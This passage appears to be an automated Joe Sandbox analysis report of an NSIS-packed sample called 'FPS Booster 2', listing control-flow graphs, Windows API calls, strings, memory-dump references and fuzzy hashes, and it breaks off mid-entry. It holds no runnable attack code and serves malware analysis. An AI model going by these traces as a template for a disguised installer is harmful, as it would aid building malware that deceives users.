                                                control_flow_graph 1064 4023f0-4023fd 1065 402403-402419 call 40145c * 2 1064->1065 1066 4024e5-4024f1 call 404f9e 1064->1066 1076 402429-402438 LoadLibraryExW 1065->1076 1077 40241b-402427 GetModuleHandleW 1065->1077 1072 4030e3-4030f2 1066->1072 1078 40243e-40244d call 406391 1076->1078 1079 4024ce-4024db call 404f9e 1076->1079 1077->1076 1077->1078 1084 40248c-4024a4 call 404f9e call 4062cf 1078->1084 1085 40244f-402455 1078->1085 1079->1066 1089 4024a7-4024aa 1084->1089 1087 402457-402463 call 401435 1085->1087 1088 40246e-40248a KiUserCallbackDispatcher 1085->1088 1087->1089 1100 402465-40246c 1087->1100 1088->1089 1089->1072 1093 4024b0-4024ba call 403ce4 1089->1093 1093->1072 1099 4024c0-4024c9 FreeLibrary 1093->1099 1099->1072 1100->1089
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040241C
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                • KiUserCallbackDispatcher.NTDLL(?,00002004,0047F000,0040C0E0,`G,?,?,?,00000008,00000001,000000F0), ref: 00402485
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                Strings
                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                • `G, xrefs: 0040246E
                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$Library$CallbackDispatcherFreeHandleLoadModuleTextUserWindowlstrcatwvsprintf
                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                • API String ID: 2832544771-4193110038
                                                • Opcode ID: 11ea408b33ed6810e24fd29753fd71f986e360d3f253baf971bc2a7019b5048c
                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                • Opcode Fuzzy Hash: 11ea408b33ed6810e24fd29753fd71f986e360d3f253baf971bc2a7019b5048c
                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

                                                Control-flow Graph

                                                control_flow_graph 1101 6e9e28a3-6e9e28b7 1102 6e9e28bb-6e9e28d2 1101->1102 1103 6e9e28fe-6e9e2903 call 6e9e1592 1102->1103 1104 6e9e28d4-6e9e28d9 1102->1104 1107 6e9e2908 1103->1107 1104->1103 1106 6e9e28db-6e9e28de 1104->1106 1108 6e9e28e7-6e9e28e9 1106->1108 1109 6e9e28e0-6e9e28e5 call 6e9e15a3 1106->1109 1110 6e9e2909-6e9e2912 1107->1110 1112 6e9e28eb-6e9e28ee 1108->1112 1113 6e9e28f9-6e9e28fc 1108->1113 1109->1110 1114 6e9e2918 1110->1114 1115 6e9e2914-6e9e2916 1110->1115 1112->1113 1117 6e9e28f0-6e9e28f7 call 6e9e1628 1112->1117 1113->1110 1119 6e9e291a-6e9e2922 1114->1119 1115->1119 1117->1107 1121 6e9e2928-6e9e292b 1119->1121 1122 6e9e2a15 1119->1122 1124 6e9e2a0a-6e9e2a13 call 6e9e167f 1121->1124 1125 6e9e2931-6e9e2934 1121->1125 1123 6e9e2a18-6e9e2a24 GlobalFree 1122->1123 1126 6e9e2a49-6e9e2a4e 1123->1126 1127 6e9e2a26-6e9e2a34 1123->1127 1124->1123 1128 6e9e29fc-6e9e2a08 call 6e9e167f 1125->1128 1129 6e9e293a-6e9e293d 1125->1129 1131 6e9e2a36-6e9e2a3b 1127->1131 1132 6e9e2a40-6e9e2a44 1127->1132 1128->1123 1134 6e9e2943 1129->1134 1135 6e9e29d0-6e9e29f5 GlobalAlloc WideCharToMultiByte 1129->1135 1131->1102 1132->1102 1134->1123 1139 6e9e2949-6e9e294c 1134->1139 1137 6e9e29f8-6e9e29fa 1135->1137 1137->1123 1140 6e9e294e-6e9e2951 1139->1140 1141 6e9e297b-6e9e29ae GlobalAlloc lstrcpynW 1139->1141 1140->1123 1142 6e9e2957-6e9e2960 lstrlenW 1140->1142 1141->1137 1143 6e9e29b0-6e9e29ce GlobalAlloc CLSIDFromString GlobalFree 1141->1143 1142->1123 1144 6e9e2966-6e9e2976 call 6e9e167f call 6e9e2554 1142->1144 1143->1123 1144->1123
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 6E9E2958
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9E2985
                                                • lstrcpynW.KERNEL32(00000000,?), ref: 6E9E2998
                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E9E29B4
                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 6E9E29C1
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E29C8
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6E9E29D8
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E9E29EF
                                                • GlobalFree.KERNELBASE(00000000), ref: 6E9E2A19
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Alloc$Free$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                • String ID:
                                                • API String ID: 916651646-0
                                                • Opcode ID: 08d616eb5104f71b95d814dce19d5c1954683e1c7d4bd7a80a852a039cc8cc63
                                                • Instruction ID: 8f80906c007a3bec1c323196550e53ba38806787892137bd2b39f7fdc548891d
                                                • Opcode Fuzzy Hash: 08d616eb5104f71b95d814dce19d5c1954683e1c7d4bd7a80a852a039cc8cc63
                                                • Instruction Fuzzy Hash: 00418AB1508206AFE762CFA5C848A6A77FCFF46322B100D59E756E7991D730D444CF61

                                                Control-flow Graph

                                                control_flow_graph 1149 6ffb1c7c-6ffb1cae SendMessageW ShowWindow 1150 6ffb1d01-6ffb1d14 SetWindowLongW 1149->1150 1151 6ffb1cb0-6ffb1cb1 1149->1151 1152 6ffb1cb7-6ffb1cd2 KiUserCallbackDispatcher IsDialogMessageW 1151->1152 1153 6ffb1cf8-6ffb1cfe 1152->1153 1154 6ffb1cd4-6ffb1ce2 IsDialogMessageW 1152->1154 1153->1152 1155 6ffb1d00 1153->1155 1154->1153 1156 6ffb1ce4-6ffb1cf2 TranslateMessage DispatchMessageW 1154->1156 1155->1150 1156->1153
                                                APIs
                                                • SendMessageW.USER32(?,0000040D,00000000), ref: 6FFB1C94
                                                • ShowWindow.USER32(00000008), ref: 6FFB1CA2
                                                • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6FFB1CBE
                                                • IsDialogMessageW.USER32(?), ref: 6FFB1CCE
                                                • IsDialogMessageW.USER32(?), ref: 6FFB1CDE
                                                • TranslateMessage.USER32(?), ref: 6FFB1CE8
                                                • DispatchMessageW.USER32(?), ref: 6FFB1CF2
                                                • SetWindowLongW.USER32(?,00000004), ref: 6FFB1D0C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Message$DialogWindow$CallbackDispatchDispatcherLongSendShowTranslateUser
                                                • String ID:
                                                • API String ID: 4159918924-0
                                                • Opcode ID: cc74dcbc2237ee50e242f0708eab917acf32ddb5ca901f190785816f8e34a796
                                                • Instruction ID: e0f4434b581fe6902f0a6e55f69541b69a9f059c795a1c4cd2237c682c394268
                                                • Opcode Fuzzy Hash: cc74dcbc2237ee50e242f0708eab917acf32ddb5ca901f190785816f8e34a796
                                                • Instruction Fuzzy Hash: 5E115B72960909EBCF009FA1ED89F9A3F7EFF467A4B004025FA1191234E730A426CB60

                                                Control-flow Graph

                                                control_flow_graph 1157 401eb9-401ec4 1158 401f24-401f26 1157->1158 1159 401ec6-401ec9 1157->1159 1160 401f53-401f7b GlobalAlloc call 406831 1158->1160 1161 401f28-401f2a 1158->1161 1162 401ed5-401ee3 call 4062cf 1159->1162 1163 401ecb-401ecf 1159->1163 1178 4030e3-4030f2 1160->1178 1179 402387-40238d GlobalFree 1160->1179 1166 401f3c-401f4e call 406035 1161->1166 1167 401f2c-401f36 call 4062cf 1161->1167 1175 401ee4-402702 call 406831 1162->1175 1163->1159 1168 401ed1-401ed3 1163->1168 1166->1179 1167->1166 1168->1162 1169 401ef7-402e50 call 406035 * 3 1168->1169 1169->1178 1189 402708-40270e 1175->1189 1179->1178 1189->1178
                                                APIs
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID: Exch: stack < %d elements$Pop: stack empty$Show
                                                • API String ID: 1459762280-1347343861
                                                • Opcode ID: dcf528aa7861a26f6c92768877dcdc2065be54f54d8d6e98b78a34fa813ca885
                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                • Opcode Fuzzy Hash: dcf528aa7861a26f6c92768877dcdc2065be54f54d8d6e98b78a34fa813ca885
                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 3376005127-0
                                                • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                • String ID:
                                                • API String ID: 2568930968-0
                                                • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                APIs
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E69
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E6E
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNELBASE(?), ref: 6E9E1E73
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E2AFA
                                                • FreeLibrary.KERNEL32(?), ref: 6E9E2B71
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E2B96
                                                  • Part of subcall function 6E9E23C1: GlobalAlloc.KERNEL32(00000040,00000000), ref: 6E9E23F3
                                                  • Part of subcall function 6E9E25B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,?,6E9E2ACB,00000000), ref: 6E9E2611
                                                  • Part of subcall function 6E9E1904: lstrcpyW.KERNEL32(00000000,error,00000000,6E9E287B,00000000), ref: 6E9E1929
                                                  • Part of subcall function 6E9E2445: wsprintfW.USER32 ref: 6E9E24E8
                                                  • Part of subcall function 6E9E2445: GlobalFree.KERNEL32(?), ref: 6E9E2516
                                                  • Part of subcall function 6E9E2445: GlobalFree.KERNEL32(00000000), ref: 6E9E253F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                • String ID:
                                                • API String ID: 1767494692-3916222277
                                                • Opcode ID: a2a35e791d9e1092ef2f4420fcf87b79c7a04e2276452d92134279632c4dcc15
                                                • Instruction ID: 8279d55b20873834db8b5a470bd7b93262c8a6c0fdee49632a38897562994eca
                                                • Opcode Fuzzy Hash: a2a35e791d9e1092ef2f4420fcf87b79c7a04e2276452d92134279632c4dcc15
                                                • Instruction Fuzzy Hash: 513113B1004303EACF569FF598D4BEA3BACAF46318F044825EB15AB996DB74C484CF20
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                • String ID: HideWindow
                                                • API String ID: 1249568736-780306582
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,?,00406961,80000002,Software\Microsoft\Windows\CurrentVersion,?,Show,Show), ref: 00405F29
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406961,80000002,Software\Microsoft\Windows\CurrentVersion,?,Show,Show), ref: 00405F4B
                                                • RegCloseKey.ADVAPI32(?,?,00406961,80000002,Software\Microsoft\Windows\CurrentVersion,?,Show,Show), ref: 00405F72
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                Similarity
                                                • API ID: ErrorImageLastLoad
                                                • String ID:
                                                • API String ID: 2189606529-0
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                APIs
                                                • SendMessageW.USER32(?,0000000B,?), ref: 004030B7
                                                • InvalidateRect.USER32(?), ref: 004030C7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: InvalidateMessageRectSend
                                                • String ID:
                                                • API String ID: 909852535-0
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E73
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                APIs
                                                • lstrcpynW.KERNEL32(?,?,6FFB1053,?,6FFB1053,?), ref: 6FFB1E62
                                                • GlobalFree.KERNELBASE ref: 6FFB1E72
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID:
                                                • API String ID: 1459762280-0
                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                • lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                Similarity
                                                • API ID: AllocGloballstrcpyn
                                                • String ID:
                                                • API String ID: 3204721840-0
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                APIs
                                                • VirtualProtect.KERNELBASE(6E9E4020,00000004,00000040,6E9E4028), ref: 6E9E2746
                                                Memory Dump Source
